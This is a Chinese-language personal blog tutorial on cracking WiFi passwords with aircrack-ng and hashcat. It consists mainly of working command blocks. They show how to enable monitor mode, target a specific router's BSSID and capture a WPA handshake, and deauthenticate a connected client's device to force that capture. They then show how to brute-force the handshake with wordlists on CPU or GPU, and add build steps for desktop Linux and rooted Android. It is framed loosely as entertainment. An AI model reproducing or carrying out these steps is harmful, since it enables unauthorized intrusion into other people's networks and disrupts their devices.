使用Linux工具破解无线网密码
Easul Lv6

破解无线网密码的步骤很简单:

  1. 抓包
  2. 暴力破解

不过也就是娱乐一下,密码较复杂的,基本上是破不出来的。
说白了也就是穷举法一个一个试嘛!

以下直接上命令行了,环境是在Deepin上,当然你也可以用kali。

折叠代码块BASH 复制代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
# 查看网卡名称,带wlan字样的,我的这里是wlp2s0
ifconfig

# 安装抓包工具
sudo apt-get install aircrack-ng

# 查看是否能够监听网卡,能够显示网卡的名称,有网卡名称(wlp2s0)字样的一行数据即可
sudo airmon-ng

# 打开无线网卡监听模式。
# 注意要断开自己的无线网。
# 另外我这里网卡名称一监听就变了,所以可以再ifconfig看一下
# 现在发现就变成了wlp2s0mon,现在监听这个即可
sudo airmon-ng start wlp2s0mon

# 扫描周边的wifi信号
# 记下想要破解的wifi的BSSID(wifi的mac地址)和CH(wifi频段)
sudo airodump-ng wlp2s0mon

# 进行抓包,命令如下
# sudo airodump-ng -c CH --bssid BSSID -w 结果保存路径 网卡名称
# 但是这样当无线网与wifi有连接成功的认证之后才能抓到包,比较慢
sudo airodump-ng -c 9 --bssid 98:13:33:79:A7:A8 -w /home/easul/Desktop/ wlp2s0mon

# 可以通过ACK死亡攻击,将已经连接的设备踢下线
# 设备的wifi自动登录之后,就可以连接了
# -0是通知设备断开连接,10是攻击10次,如果迟迟获取不到抓包数据,可以设置大一些
# -a是刚刚的BSSID
# -c是踢下线的设备,为刚刚抓包下的STATION下的任意一个mac地址
# 然后我们另开一个窗口使用这个命令
sudo aireplay-ng -0 10 -a 98:13:33:79:A7:A8 -c 22:C0:5F:C5:44:5D wlp2s0mon

# 当刚刚的抓包界面出现WPA handshake: 98:13:33:79:A7:A8(后边的是这个路由器的BSSID)的字样时
# 抓包就成功了,然后ctrl+c停止抓包,顺便解除网卡监听
sudo airmon-ng stop wlp2s0mon

# 然后下载字典进行暴力破解
# -w是字典,-b是刚刚的BSSID,后边跟上抓的cap包
sudo aircrack-ng -w /home/easul/Desktop/password.txt -b 98:13:33:79:A7:A8 /home/easul/Desktop/test.cap

# 如果嫌CPU进行密码暴力破解比较慢,可以使用GPU进行破解
# 需要先安装hashcat
# windows如果破解的话,无法安装,可以去github下载
# https://github.com/hashcat/hashcat/releases
sudo apt-get install hashcat

# 转换抓包文件到hashcat格式,-j后边的是新格式的文件名称
sudo aircrack-ng test.cap -j hashcat

# 用hashcat来破解
# 2500 一般用于unix密码破解,比较常用
hashcat -m 2500 hashcat.hccapx /home/easul/Desktop/password.txt

# 如果需要转为22000,可以使用如下网站先进行转换,然后再破解
# 22000 可用于wifi密码破解
# -m 指定模型
# -a 1 指定密码为组合密码模式
# -d 指定显卡号
# cap转22000: https://hashcat.net/cap2hashcat/
cd cap
hashcat -m 22000 393808_1730114561.hc22000 -a 1 front.txt end.txt --force -d 3
# 查看显卡信息
hashcat -I

注意:破解成功与否主要和密码字典有关,反正我是没有成功==!

你也可以测试你自己家的密码,你在一个文本里写上你家的密码后,还像这样进行密码爆破,就成功了!

附几个密码包(仅供娱乐使用,可能大概率破解不出来)

hashcat用法的参考链接

aircrack-ng的参考

2024年12月9日: 增加电脑自行编译安装的步骤

折叠代码块BASH 复制代码
1
2
3
4
5
6
7
8
9
10
11
12
13
# 安装必要依赖,这里是在Deepin下安装的
sudo apt-get install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils
# 下载源码包,目前最新版本是 1.7
cd ~/Desktop
wget https://download.aircrack-ng.org/aircrack-ng-1.7.tar.gz
tar -zxvf aircrack-ng-1.7.tar.gz
cd aircrack-ng-1.7
# 配置检查,及编译
autoreconf -i
./configure --with-experimental
make
sudo make install
ldconfig

参考如下

2025年5月11日: 增加termux自行编译安装的步骤

折叠代码块BASH 复制代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# 更新完之后不会编译错误
pkg update
pkg upgrade
# 安装必备工具包
apt install git
apt install python
apt install clang automake autoconf binutils libtool
# 克隆仓库
git clone https://github.com/aircrack-ng/aircrack-ng.git
cd aircrack-ng
# 进行相关编译
autoreconf -i
./configure --with-experimental
# 编译后 airmon-ng 在本地目录的 scripts 目录中,其他工具包在本地目录
make
# 这里运行相关软件,需要手机已经root
# 如果需要手动开启手机WIFI的监听模式,可以使用如下命令
echo "4" > /sys/module/wlan/parameters/con_mode
# 如果需要使用root模式,可以使用如下方式
pkg install tsu
# 进入root模式
tsu
# 查看是否网卡处于 monitor 模式
iw dev
# 目前运行 airodump-ng wlan0 会提示如下错误
# 下边这行没什么问题
# CANNOT LINK EXECUTABLE "sh": "/data/data/com.termux/files/usr/lib/libtermux-exec-ld-preload.so"
# 提示需要安装的包 modprobe rfkill 也可以不装
# 主要是这个
# ioctl(SIOCSIWMODE) failed: Operation not supported on transport endpoint
# ioctl(SIOCSIWMODE) failed: Operation not supported on transport endpoint
# Error setting monitor mode on wlan0
# Failed initializing wireless card(s): wlan0

参考

2025年5月11日: 使用proot安装aircrack-ng

折叠代码块BASH 复制代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
pkg update
pkg upgrade
pkg install proot-distro curl wget tsu
# 因为当前时间没有 kali,且安装ubuntu并不能够用包管理器安装 aircrack-ng
# 所以安装Debian
proot-distro install debian
# 进入 root
tsu
proot-distro login debian
# 相关工具安装
apt update && apt upgrade
apt install aircrack-ng wireless-tools iw net-tools
# 安装后我的使用还是和在termux下的aircrack-ng有一样的问题
# 估计就只能插外接的usb无线网设备了

注意的点

  • wpa_supplicant 不关闭也可以使网卡处于监听模式
 评论
来发评论吧~
Powered By Valine
v1.5.2